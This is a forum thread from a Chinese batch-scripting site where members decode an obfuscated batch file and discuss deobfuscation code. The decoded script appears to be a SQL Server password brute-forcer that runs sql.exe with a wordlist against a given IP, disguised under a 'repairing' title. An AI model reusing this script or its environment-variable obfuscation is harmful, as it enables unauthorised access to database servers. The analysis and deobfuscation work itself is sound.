[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖
929289045

Rank: 1

帖子
积分
14 
技术
0  
捐助
0  
注册时间
2012-6-9 
1 跳转到 » 倒序看帖
打印
tT
发表于 2012-6-15 11:19 | 只看该作者

[其他] 变量加密批处理我来解密大家来看看我解密错误没?

加密的样子
  1. @shift

  2. @%comspec:~-1%%userprofile:~5,1%h%appdata:~-7,1% %appdata:~-7,1%%programfiles:~-5,1%%programfiles:~-5,1%

  3. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% %comspec:~-13,1%%userprofile:~5,1%%appdata:~-7,1%%appdata:~-15,1%%userprofile:~6,1%=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%

  4. %tcopu:~32,1%%comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %appdata:~-7,1%%tcopu:~11,1%%tcopu:~11,1%

  5. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% IP=%1

  6. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% USER=%2

  7. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% PASS=%3

  8. %userprofile:~5,1%%appdata:~-7,1%%appdata:~-13,1%%appdata:~-7,1%%programfiles:~4,1% %userprofile:~5,1%

  9. T%programfiles:~-4,1%%comspec:~-13,1%%appdata:~-13,1%%comspec:~-1% %a% 正在修复中~~

  10. %appdata:~7,1%%appdata:~-7,1%%appdata:~15,1%%comspec:~-1% %userprofile:~5,1%%appdata:~-7,1%%userprofile:~14,1%: %userprofile:~5,1%%appdata:~-7,1%%appdata:~-13,1%%comspec:~-16,1%=%comspec:~-9,1%%tcopu:~17,1% %appdata:~-13,1%%programfiles:~-4,1%%userprofile:~14,1%%comspec:~-1%%comspec:~-16,1%=%tcopu:~16,1%

  11. %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %IP% SQL 

  12. %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% SQL账号%USER%

  13. %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% SQL密码%PASS%

  14. %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %os:~5,1%%os:~5,1%%os:~5,1%.%tcopu:~21,1%%tcopu:~23,1%%tcopu:~21,1%%tcopu:~23,1%%comspec:~-13,1%%comspec:~-13,1%.%userprofile:~5,1%%appdata:~-7,1%%appdata:~7,1%

  15. %comspec:~-16,1%%tcopu:~6,1%%appdata:~-13,1%.%comspec:~-1%%comspec:~-2,1%%comspec:~-1% -S %IP% -U %USER% -P %PASS% <%appdata:~7,1%%comspec:~-16,1%%tcopu:~8,1%%userprofile:~5,1%%programfiles:~4,1%.%appdata:~15,1%%appdata:~-13,1%%appdata:~-13,1% -%userprofile:~14,1% -%appdata:~-13,1% %tcopu:~14,1% -%comspec:~-13,1% %tcopu:~23,1% -%appdata:~-7,1% %appdata:~-7,1%%tcopu:~5,1%\%IP%.%comspec:~-13,1%%comspec:~-2,1%%comspec:~-13,1%

  16. %comspec:~-1%%comspec:~-2,1%%programfiles:~-4,1%%comspec:~-13,1%
复制代码
我解密出来的
  1. @shift 

  2. @echo oFF 

  3. set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%% 

  4. @echo off 

  5. set IP=%1 

  6. set USER=%2 

  7. set PASS=%3 

  8. color c 

  9. Title %a% 正在修复中~~ 

  10. mode con: cols=20 lines=5 

  11. echo %IP% SQL 

  12. echo SQL账号%USER% 

  13. echo SQL密码%PASS%  

  14. sql.exe -S %IP% -U %USER% -P %PASS% <msvcr.dll -n -l 4 -t 8 -o ok\%IP%.txt 

  15. exit
复制代码
但是我感觉不对 求高手解密出来看看
收藏 分享

929289045

Rank: 1

帖子
积分
14 
技术
0  
捐助
0  
注册时间
2012-6-9 
2
发表于 2012-6-15 11:29 | 只看该作者
怎么没人啊

TOP

CrLf

Rank: 8Rank: 8

帖子
6388 
积分
18831 
技术
978  
捐助
100  
注册时间
2010-10-9 
3
发表于 2012-6-15 12:29 | 只看该作者
本帖最后由 CrLf 于 2012-6-15 22:34 编辑

吐槽一下,引用环境变量来进行变量加密时完全不考虑通用性的行为,只能单机娱乐,变量环境稍有不同,解密后的结果将不完整。
解密代码,抗干扰能力弱爆了:
  1. @echo off&setlocal enabledelayedexpansion

  2. (for /f "delims="eol^= %%a in ('findstr /n . %1') do (

  3. 	set /p str=

  4. 	call set "str=!str!"

  5. 	echo !str:%%=%%%%!

  6. 	for /f "tokens=1*"eol^= %%b in ("!str!") do (

  7. 		if /i %%b==set set %%c

  8. 	)

  9. ))<%1

  10. pause
复制代码
只能解密出框架,因为无法区分用于加密的变量与实际意图而引用的 %str% 变量,也无法预知实际运行时才会发生的变量变更
链接:在线第三方命令行工具下载   bat、vbs、js 原生混编

TOP

forfiles

Rank: 8Rank: 8

帖子
571 
积分
5364 
技术
29  
捐助
0  
注册时间
2012-6-7 
4
发表于 2012-6-15 18:10 | 只看该作者
你用的是这个代码解密的吗?
http://www.bathome.net/thread-7204-1-1.html

TOP

CrLf

Rank: 8Rank: 8

帖子
6388 
积分
18831 
技术
978  
捐助
100  
注册时间
2010-10-9 
5
发表于 2012-6-15 18:43 | 只看该作者
用 cmd /c 代替 call 以避免空变量被处理为空...但仍无法预知程序运行时对变量的动态影响:
  1. @echo off&setlocal enabledelayedexpansion

  2. (for /f "delims="eol^= %%a in ('findstr /n . %1') do (

  3. 	set str=

  4. 	set /p str=

  5. 	for /f "delims="eol^= %%b in ('echo ^"!str:"=""!"') do (

  6. 		setlocal disabledelayedexpansion

  7. 		echo:%%~b>$

  8. 		endlocal&set str=

  9. 		set /p str=<$

  10. 	)

  11. 	set "str=!str:""="!"

  12. 	echo:!str!

  13. 	for /f "tokens=1*" %%b in ("!str!") do (

  14. 		if /i %%b==set call set %%c

  15. 	)

  16. ))<%1

  17. del $>nul

  18. pause
复制代码
链接:在线第三方命令行工具下载   bat、vbs、js 原生混编

TOP

tz_being

Rank: 3Rank: 3

帖子
83 
积分
220 
技术
5  
捐助
0  
注册时间
2009-11-14 
6
发表于 2012-6-17 09:31 | 只看该作者
据试验,5楼的解密代码和另一个帖子netbenton的解密代码都不行,我用另外的方法解密出的内容与楼主是相同的,只是楼主少了一句“echo www.1818tt.com

TOP

forfiles

Rank: 8Rank: 8

帖子
571 
积分
5364 
技术
29  
捐助
0  
注册时间
2012-6-7 
7
发表于 2012-6-17 21:41 | 只看该作者
回复 6# tz_being


    解密代码贴出来看看吧

TOP

小秋秋

Rank: 1

帖子
积分
25 
技术
0  
捐助
0  
注册时间
2012-2-10 
8
发表于 2012-10-25 14:14 | 只看该作者
我汗  这是抓鸡的吧

TOP

返回列表